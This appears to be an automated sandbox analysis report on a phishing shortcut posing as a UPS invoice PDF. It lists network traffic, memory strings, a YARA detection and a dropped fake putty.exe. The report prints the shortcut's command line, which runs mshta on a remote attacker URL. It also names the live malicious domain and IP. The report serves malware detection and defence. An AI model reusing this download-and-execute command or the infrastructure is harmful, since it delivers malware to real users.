Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficDNS traffic detected: DNS query: nebulaquestcorporation.cc
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.10.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000006.00000002.2769097256.00000253D7800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.1556558495.00000253D7630000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: mshta.exe, 00000004.00000003.1790203146.0000023797674000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792532536.0000023797675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/
Source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, Invoice-UPS-218931.pdf.lnk.mal.lnkString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: powershell.exeString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:?
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage.
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...
Source: mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...8
Source: mshta.exe, 00000004.00000003.1787060368.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793563743.0000023F9A1A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788076442.0000023F9A1A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790777524.0000023F9A1A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...w
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage6
Source: mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792606600.00000237976B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1787859516.00000237976AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC:
Source: mshta.exe, 00000004.00000002.1792236967.0000023797580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageH
Source: mshta.exe, 00000004.00000002.1792262251.0000023797590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGj
Source: mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMI
Source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC:
Source: mshta.exe, 00000004.00000002.1792396309.00000237975E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#M
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegs
Source: mshta.exe, 00000004.00000003.1789392993.0000023F9FAA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/inv
Source: forfiles.exe, 00000001.00000002.1527302987.00000229F2D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagero
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/putty.exep
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe, 0000000C.00000000.1637581496.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe.7.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DB950 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,12_2_00007FF6785DB950
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D7060 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA,12_2_00007FF6785D7060
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D85D0 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,GlobalFree,GlobalFree,12_2_00007FF6785D85D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DB950 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,12_2_00007FF6785DB950
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D1EED ShowCursor,GetCursorPos,MonitorFromPoint,GetMonitorInfoA,IsZoomed,GetWindowLongPtrA,SendMessageA,GetKeyboardState,GetKeyboardState,GetMessageTime,ReleaseCapture,SetCapture,12_2_00007FF6785D1EED

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 4620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
Very long command line found
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3325
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3325Jump to behavior
Windows shortcut file (LNK) contains suspicious command line arguments
Source: Invoice-UPS-218931.pdf.lnk.mal.lnkLNK file: /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67861BD5012_2_00007FF67861BD50
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D53E312_2_00007FF6785D53E3
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DCB2412_2_00007FF6785DCB24
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F2C6012_2_00007FF6785F2C60
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860AEF412_2_00007FF67860AEF4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F6F7C12_2_00007FF6785F6F7C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F65F012_2_00007FF6785F65F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DB9B012_2_00007FF6785DB9B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786AF96412_2_00007FF6786AF964
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868F9DC12_2_00007FF67868F9DC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786B1A9412_2_00007FF6786B1A94
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860DA7012_2_00007FF67860DA70
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864BB2012_2_00007FF67864BB20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869BB9012_2_00007FF67869BB90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F3C2012_2_00007FF6785F3C20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678617C3012_2_00007FF678617C30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678651CB012_2_00007FF678651CB0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D7D5012_2_00007FF6785D7D50
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864DE2012_2_00007FF67864DE20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D9E0012_2_00007FF6785D9E00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786ADDF812_2_00007FF6786ADDF8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678623EA012_2_00007FF678623EA0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860FE9012_2_00007FF67860FE90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864FE6012_2_00007FF67864FE60
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D1EED12_2_00007FF6785D1EED
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DA01E12_2_00007FF6785DA01E
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DA03212_2_00007FF6785DA032
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E403012_2_00007FF6785E4030
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D608012_2_00007FF6785D6080
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DA03E12_2_00007FF6785DA03E
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786B60D412_2_00007FF6786B60D4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786A51A812_2_00007FF6786A51A8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D116012_2_00007FF6785D1160
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860D15012_2_00007FF67860D150
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864F23012_2_00007FF67864F230
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D11BB12_2_00007FF6785D11BB
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DF28012_2_00007FF6785DF280
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860F26012_2_00007FF67860F260
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E133012_2_00007FF6785E1330
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860531012_2_00007FF678605310
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786232EC12_2_00007FF6786232EC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864D2D012_2_00007FF67864D2D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DD2D012_2_00007FF6785DD2D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869338412_2_00007FF678693384
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67861943012_2_00007FF678619430
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864D43012_2_00007FF67864D430
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D142612_2_00007FF6785D1426
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67865D41012_2_00007FF67865D410
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D741012_2_00007FF6785D7410
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D93C012_2_00007FF6785D93C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786A549012_2_00007FF6786A5490
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864948012_2_00007FF678649480
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E4A8012_2_00007FF6785E4A80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786515A012_2_00007FF6786515A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F156012_2_00007FF6785F1560
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860F55012_2_00007FF67860F550
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786176A012_2_00007FF6786176A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F156012_2_00007FF6785F1560
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E365012_2_00007FF6785E3650
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F370012_2_00007FF6785F3700
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860178012_2_00007FF678601780
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DD81012_2_00007FF6785DD810
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869F80412_2_00007FF67869F804
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786A588812_2_00007FF6786A5888
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E589012_2_00007FF6785E5890
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67869387C12_2_00007FF67869387C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D992012_2_00007FF6785D9920
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786158D012_2_00007FF6786158D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678616A0012_2_00007FF678616A00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864A9C012_2_00007FF67864A9C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E4A8012_2_00007FF6785E4A80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678622A8012_2_00007FF678622A80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678690A4812_2_00007FF678690A48
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785E0B0012_2_00007FF6785E0B00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678652B1012_2_00007FF678652B10
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678614B0012_2_00007FF678614B00
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785FAAF012_2_00007FF6785FAAF0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67868EB9412_2_00007FF67868EB94
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678690C3012_2_00007FF678690C30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785F4C3012_2_00007FF6785F4C30
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678696CA412_2_00007FF678696CA4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785ECDA012_2_00007FF6785ECDA0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DED8012_2_00007FF6785DED80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678628E2012_2_00007FF678628E20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678690E1812_2_00007FF678690E18
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864EE1012_2_00007FF67864EE10
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678692E8012_2_00007FF678692E80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678650F2012_2_00007FF678650F20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6786AAEC812_2_00007FF6786AAEC8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678616F9012_2_00007FF678616F90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67862B02012_2_00007FF67862B020
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67860701012_2_00007FF678607010
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF678646FE012_2_00007FF678646FE0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785FF06012_2_00007FF6785FF060
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864912012_2_00007FF678649120
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF67864E17012_2_00007FF67864E170
